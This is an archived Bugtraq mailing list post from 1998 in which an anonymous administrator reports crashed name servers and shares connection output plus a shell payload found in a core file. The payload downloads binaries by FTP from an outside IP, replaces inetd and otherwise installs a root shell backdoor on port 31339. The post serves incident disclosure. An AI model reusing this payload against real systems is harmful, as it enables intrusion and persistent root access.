Bugtraq mailing list archives
Yipes named attack
From: nobody () ANON MYOFB ORG (Anonymous)
Date: Wed, 24 Jun 1998 16:20:01 -0400
All my name servers cored connections looked like thislocalhost.36486 localhost.32773 32768 0 8192 0 ESTABLISHED localhost.32773 localhost.36486 8192 0 32768 0 ESTABLISHED localhost.36489 localhost.32773 32768 0 8192 0 ESTABLISHED localhost.32773 localhost.36489 8192 0 32768 0 ESTABLISHED localhost.36492 localhost.36484 32768 0 8192 0 ESTABLISHED localhost.36484 localhost.36492 8192 0 32768 0 ESTABLISHED localhost.36495 localhost.36494 32768 0 8192 0 ESTABLISHED localhost.36494 localhost.36495 8192 0 32768 0 ESTABLISHED localhost.36498 localhost.36484 32768 0 8192 0 ESTABLISHED localhost.36484 localhost.36498 8192 0 32768 0 ESTABLISHED localhost.36501 localhost.36500 32768 0 8192 0 ESTABLISHED localhost.36500 localhost.36501 8192 0 32768 0 ESTABLISHED localhost.36516 localhost.36484 32768 0 8192 0 ESTABLISHED localhost.36484 localhost.36516 8192 0 32768 0 ESTABLISHED localhost.36519 localhost.36518 32768 0 8192 0 ESTABLISHED localhost.36518 localhost.36519 8192 0 32768 0 ESTABLISHED
this is in the core file
/bin/bash export HISTFILE=;if [ ! -x /sbin/inetd ];then cd /sbin;ping -c 1 208.21.174.3;ec ho -e 'open 208.21.174.3\nuser ftp h@e.y\nbin\nget i\nget d\nbye'|ftp -vin;if [ -f i ];then chmod a+rx i d;mv i inetd;./d;else echo '31339 stream tcp nowait roo t /bin/bash sh -i'>/etc/inetd.conf;fi;fie
Sun tells me to appl the latest patch but 7 phone calls later can't tell me if the patch addresses this hack. =;{>
Current thread:
- ncftp 2.4.3 bug Paul Boehm (Jun 20)
- <Possible follow-ups>
- Re: ncftp 2.4.3 bug Mike Gleason (Jun 22)
- Re: ncftp 2.4.3 bug Paul Boehm (Jun 22)
- Re: ncftp 2.4.3 bug Liviu Daia (Jun 23)
- textcounter.pl SECURITY HOLE Doru Petrescu (Jun 23)
- Re: textcounter.pl SECURITY HOLE Rich Lafferty (Jun 24)
- Yipes named attack Anonymous (Jun 24)
- security hole in mailx Alvaro Martinez Echevarria (Jun 24)
- Re: security hole in mailx gold (Jun 25)
- Re: security hole in mailx Casper Dik (Jun 25)
- Bug is sudo? Rhodie (Jun 25)
- Re: Bug is sudo? Warner Losh (Jun 26)
- Re: Bug is sudo? Todd C. Miller (Jun 27)
- Re: security hole in mailx Alvaro Martinez Echevarria (Jun 25)
- Re: security hole in mailx Ben Collins (Jun 25)
- Re: security hole in mailx Theo de Raadt (Jun 25)
- guestbook script is still vulnerable under apache Stunt Pope (Jun 25)